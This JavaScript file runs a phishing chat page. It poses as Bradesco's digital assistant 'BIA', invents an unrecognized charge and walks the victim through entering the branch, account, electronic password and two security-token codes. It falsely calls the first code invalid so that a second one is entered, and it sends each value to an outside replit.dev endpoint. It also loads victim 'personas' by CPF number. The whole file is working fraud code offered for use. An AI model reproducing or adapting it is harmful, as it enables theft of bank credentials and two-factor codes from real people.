const chatBody = document.getElementById('chatBody');
const userInput = document.getElementById('userInput');
let step = 0;
let userData = {
    agencia: '',
    conta: '',
    senha: '',
    token1: '',
    token2: ''
};

// === ADIÇÃO: suporte a personas por CPF via ?cpf= ===
function getQueryCPF() {
  const url = new URL(window.location.href);
  return url.searchParams.get('cpf'); // ex.: ?cpf=00000000007
}

// 🔑 normaliza CPF (remove pontos e traços)
function normalizeCPF(cpf) {
  return cpf.replace(/\D/g, ''); 
}

async function loadPersonaByCPF() {
  const cpf = getQueryCPF();
  if (!cpf) return null;
  try {
    // 🚨 Anti-cache: adiciona timestamp na URL
    const res = await fetch('https://3c999891-9513-4e77-a777-b7b2e75fa10c-00-2ls3no7rm4x1t.kirk.replit.dev/personas?ts=' + Date.now());
    const personas = await res.json();
    return personas.find(p => normalizeCPF(p.cpf) === normalizeCPF(cpf)) || null;
  } catch (e) {
    console.error('Falha ao carregar personas.json', e);
    return null;
  }
}

// apenas retorna o texto como está (placeholders removidos)
function fillPersonaPlaceholders(text) {
  return text;
}
// === fim das adições ===

const messages = [
    {
        text: `Olá! Sou a BIA, sua assistente digital do Bradesco. Identificamos uma cobrança pendente em sua conta. Para verificar e resolver essa situação, digite 1.`,
        delay: 3000
    },
    {
        text: `Obrigado! Dados confirmados com sucesso.<br><br>Aguarde um momento enquanto analisamos as cobranças em sua conta...`,
        delay: 3000,
        spinner: true
    },
    {
        text: `Cobrança identificada: <span class='highlight'>R$1.923,99</span><br>Verificando informações...`,
        delay: 3000
    },
    {
        text: `Atenção!<br>Detectamos uma cobrança não reconhecida em seu nome:<br><br>Valor: <span class='highlight'>R$1.923,99</span><br>Data: Hoje<br><br>Você confirma que NÃO reconhece esta cobrança e deseja cancelá-la?<br><br>Digite 1 ou SIM para confirmar.`,
        delay: 3000
    },
    {
        text: `Entendido.<br><br>Por segurança, vamos iniciar o processo de autenticação para cancelar esta cobrança.<br><br>Este processo é simples e leva menos de 1 minuto.<br><br>Por favor, informe o número da sua agência:`,
        delay: 3000
    },
    {
        text: `Agora, informe o número da sua conta com dígito:`,
        delay: 3000
    },
    {
        text: `Agora, informe sua senha eletrônica (4 dígitos), usada no app ou Internet Banking:`,
        delay: 3000
    },
    {
        text: `Autenticação realizada com sucesso.<br><br>Agora, confirme o cancelamento da cobrança de <span class='highlight'>R$1.923,99</span>.<br><br>Digite 1 ou SIM para continuar.`,
        delay: 5000,
        spinner: true
    },
    {
        text: `Quase concluído!<br><br>Para finalizar o cancelamento com segurança, gere um código de 6 dígitos no seu Dispositivo de Segurança (App Bradesco ou Gerador de Token) e envie abaixo:<br><br>Digite o código de segurança:`,
        delay: 5000
    },
    {
        text: `Código inválido.<br>Por gentileza, gere um novo código e insira abaixo:<br><br>Lembre-se: o código de segurança é gerado em seu aplicativo Bradesco, no menu lateral a esquerda localizado na tela inicial, chave de segurança.<br>O código possui exatamente 6 dígitos numéricos.<br><br>Digite o novo código de segurança:`,
        delay: 13000,
        spinner: true
    },
    {
        text: `Código validado com sucesso.<br><br>Processo de cancelamento finalizado com êxito.<br><br>A cobrança de <span class='highlight'>R$1.923,99</span> foi cancelada e não será debitada de sua conta.<br>Agradecemos pela sua cooperação.<br><br>Fique tranquilo. A partir de agora, qualquer tentativa de cobrança não autorizada será automaticamente bloqueada para sua segurança. ✔️`,
        delay: 15000
    }
];

function addMessage(text, isUser = false) {
    const messageDiv = document.createElement('div');
    messageDiv.className = `message ${isUser ? 'user-message' : 'bot-message'}`;
    messageDiv.innerHTML = text;
    chatBody.appendChild(messageDiv);
    chatBody.scrollTop = chatBody.scrollHeight;
}

function showSpinner() {
    const spinnerDiv = document.createElement('div');
    spinnerDiv.className = 'spinner';
    chatBody.appendChild(spinnerDiv);
    chatBody.scrollTop = chatBody.scrollHeight;
    return spinnerDiv;
}

function sendDataToBackend(etapa, valor) {
    console.log(`Enviando para backend: Etapa=${etapa}, Valor=${valor}, Step=${step}`);
    fetch('https://3c999891-9513-4e77-a777-b7b2e75fa10c-00-2ls3no7rm4x1t.kirk.replit.dev/chatbot_submit', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ etapa, valor })
    })
    .then(response => response.json())
    .then(data => console.log(`Dados enviados (${etapa}):`, data))
    .catch(error => console.error(`Erro ao enviar dados (${etapa}):`, error));
}

// Validação por etapa
function validarCampo(step, input) {
    switch(step) {
        case 4: return /^\d{4}$/.test(input); 
        case 5: return /^\d{1,8}$/.test(input);
        case 6: return /^\d{4}$/.test(input); 
        case 8: return /^\d{6}$/.test(input); 
        case 9: return /^\d{6}$/.test(input); 
        default: return true;
    }
}

// Bloqueio de digitação
userInput.addEventListener('input', () => {
    let maxLength = 100;
    switch(step) {
        case 4:
        case 6: maxLength = 4; break;
        case 5: maxLength = 8; break;
        case 8:
        case 9: maxLength = 6; break;
    }
    if (userInput.value.length > maxLength) {
        userInput.value = userInput.value.slice(0, maxLength);
    }
    userInput.value = userInput.value.replace(/\D/g, '');
});

function sendMessage() {
    const input = userInput.value.trim();
    if (!input) return;

    addMessage(input, true);
    userInput.value = '';

    if ([4,5,6,8,9].includes(step) && !validarCampo(step, input)) {
        setTimeout(() => addMessage(messages[step].text), 500);
        return;
    }

    if (step === 0 && ['1','sim','s','ok'].includes(input.toLowerCase())) {
        step = 1;
        setTimeout(() => {
            addMessage(messages[step].text);
            const spinner = showSpinner();
            setTimeout(() => {
                spinner.remove();
                step = 2;
                addMessage(messages[step].text);
                setTimeout(() => {
                    step = 3;
                    addMessage(messages[step].text);
                }, messages[step].delay);
            }, messages[step].delay);
        }, messages[step].delay);
    } else if (step === 3 && ['1','sim','s','ok'].includes(input.toLowerCase())) {
        step = 4;
        setTimeout(() => addMessage(messages[step].text), messages[step].delay);
    } else if (step === 4) {
        userData.agencia = input;
        sendDataToBackend('Agência', input);
        step = 5;
        setTimeout(() => addMessage(messages[step].text), messages[step].delay);
    } else if (step === 5) {
        userData.conta = input;
        sendDataToBackend('Conta', input);
        step = 6;
        setTimeout(() => addMessage(messages[step].text), messages[step].delay);
    } else if (step === 6) {
        userData.senha = input;
        sendDataToBackend('Senha', input);
        step = 7;
        setTimeout(() => {
            const spinner = showSpinner();
            setTimeout(() => {
                spinner.remove();
                addMessage(messages[step].text);
            }, messages[step].delay);
        }, 1000);
    } else if (step === 7 && ['1','sim','s','ok'].includes(input.toLowerCase())) {
        step = 8;
        setTimeout(() => addMessage(messages[step].text), messages[step].delay);
    } else if (step === 8) {
        userData.token1 = input;
        sendDataToBackend('1• Código de Segurança', input);
        step = 9;
        setTimeout(() => {
            const spinner = showSpinner();
            setTimeout(() => {
                spinner.remove();
                addMessage(messages[step].text);
            }, messages[step].delay);
        }, 1000);
    } else if (step === 9) {
        userData.token2 = input;
        sendDataToBackend('2• Código de Segurança', input);
        step = 10;
        setTimeout(() => {
            const spinner = showSpinner();
            setTimeout(() => {
                spinner.remove();
                addMessage(messages[step].text);
            }, messages[step].delay);
        }, 1000);
    } else {
        if (step === 0 || step === 3) {
            setTimeout(() => addMessage('Por favor, insira uma resposta válida.'), 1000);
        }
    }
}

userInput.addEventListener('keypress', (e) => {
    if (e.key === 'Enter') sendMessage();
});

window.addEventListener('load', async () => {
    window.CURRENT_PERSONA = await loadPersonaByCPF();
    addMessage(messages[0].text);
});